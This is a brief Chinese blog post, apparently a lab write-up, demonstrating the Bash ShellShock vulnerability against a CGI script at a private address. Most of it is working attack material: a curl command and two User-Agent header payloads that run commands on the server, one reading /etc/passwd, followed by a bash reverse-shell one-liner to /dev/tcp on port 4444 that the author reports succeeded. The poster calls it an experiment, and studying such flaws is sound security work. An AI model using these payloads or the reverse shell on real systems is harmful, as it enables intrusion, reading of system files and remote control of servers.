特征
如图所示
1、网站title是Bash ShellShock
2、victim.cgi文件


详细说明请看
https://www.cnblogs.com/cute-puli/p/14649873.html
楼主这里只做实验
3个exp
exp1
curl -A "() { :; }; echo; /bin/cat /etc/passwd" http://192.168.100.34:8080/victim.cgi

exp2
User-Agent: () { foo; }; echo Content-Type: text/plain; echo; /usr/bin/id

exp3
User-Agent: () { :;};echo;echo $(/bin/ls -al /);/usr/bin/id;

思考
既然可以执行命令,那我们还是反弹一个shell吧
/bin/bash -i >& /dev/tcp/192.168.100.34/4444 0>&1

成功反弹

本文介绍了Bash ShellShock漏洞,通过三个exploit示例展示了如何利用该漏洞执行命令,包括从远程获取系统信息。文章还提及了利用漏洞反弹shell的方法,进一步探讨了命令注入的安全风险。
543

被折叠的 条评论
为什么被折叠?



